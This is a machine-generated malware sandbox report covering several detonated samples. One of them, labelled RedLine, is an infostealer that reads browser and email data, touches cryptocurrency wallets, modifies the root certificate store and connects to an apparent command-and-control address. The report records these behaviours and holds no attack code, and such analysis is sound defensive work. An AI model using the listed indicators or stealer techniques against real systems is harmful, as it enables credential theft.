N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 4524 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 4524 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 312 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 312 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2552 wrote to memory of 2172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc6d46f8,0x7ff9cc6d4708,0x7ff9cc6d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,7896604772173499764,13520441990218038575,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

\??\pipe\LOCAL\crashpad_2552_ZYJYCGDISTQDBLFM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4c9b7e612ef21ee665c70534d72524b0
SHA1 e76e22880ffa7d643933bf09544ceb23573d5add
SHA256 a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e
SHA512 e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1917388433c6f792d1085aa309b384a7
SHA1 9725798e15b7bf46f8d26a0535c6bb59987a9b06
SHA256 908729e567f32e2518107ea24535a15b1d5cf625a6be1ce4467ed3354965fed9
SHA512 5df01177830204beaad668d9953ccc4dff89c1cea26ef3ceacfb3820fbe54176bea95237242ca9ca25ee3e4472e3cb3cee8139793c7a0aa3915edeb4591d0b52

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b1a34984ece315bb87606a7d53e26fdb
SHA1 6bb64758305c555a4a7117d5c6b1aa166b475876
SHA256 b28aaa3f5f688b4d2adfc3e1d2c958d38aeefc4192f654f00ad64de322805e76
SHA512 83367f097b1cfcd88480af2f61bc0e70f972ad36698bfbb8d7167fae8db2cc2306c83b479324050bd533392144e81ce98593bfa4fa52ae08429efe903c51a260

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1e60b1b6d76863b701c3dfabd3a825c8
SHA1 485337a1df7e3e2bff883554a27a0b1871120809
SHA256 42beacd17ed80abb1bc5aa2481570aead14ebc1d41ed8a706e7df8970663bad1
SHA512 ca1c5320c16a87157754e1a4de843b2dee7fa5135b73ce4042a33b553356cf3bcda3fee815a483a494f82b40a6d59c9c9922f9018000157511657043a4fa9f47

Analysis: behavioral30

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 104.115.34.42:80 www.microsoft.com tcp

Files

memory/2848-0-0x000002448B110000-0x000002448B210000-memory.dmp

memory/2848-1-0x00007FF916F53000-0x00007FF916F55000-memory.dmp

memory/2848-2-0x000002448CB30000-0x000002448CB82000-memory.dmp

memory/2848-3-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

memory/2848-4-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

memory/2848-5-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

memory/2848-6-0x00007FF6EA3E0000-0x00007FF6EA58E000-memory.dmp

memory/2848-7-0x00000244A62A0000-0x00000244A63AA000-memory.dmp

memory/2848-8-0x000002448CBC0000-0x000002448CBD2000-memory.dmp

memory/2848-9-0x00000244A60C0000-0x00000244A60FC000-memory.dmp

memory/2848-10-0x000002448B110000-0x000002448B210000-memory.dmp

memory/2848-11-0x00000244A6750000-0x00000244A6912000-memory.dmp

memory/2848-12-0x00000244A7760000-0x00000244A7C88000-memory.dmp

memory/2848-13-0x00000244A63B0000-0x00000244A6400000-memory.dmp

memory/2848-14-0x00007FF916F53000-0x00007FF916F55000-memory.dmp

memory/2848-15-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

memory/2848-16-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

memory/2848-18-0x00007FF916F50000-0x00007FF917A11000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241023-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2076 set thread context of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
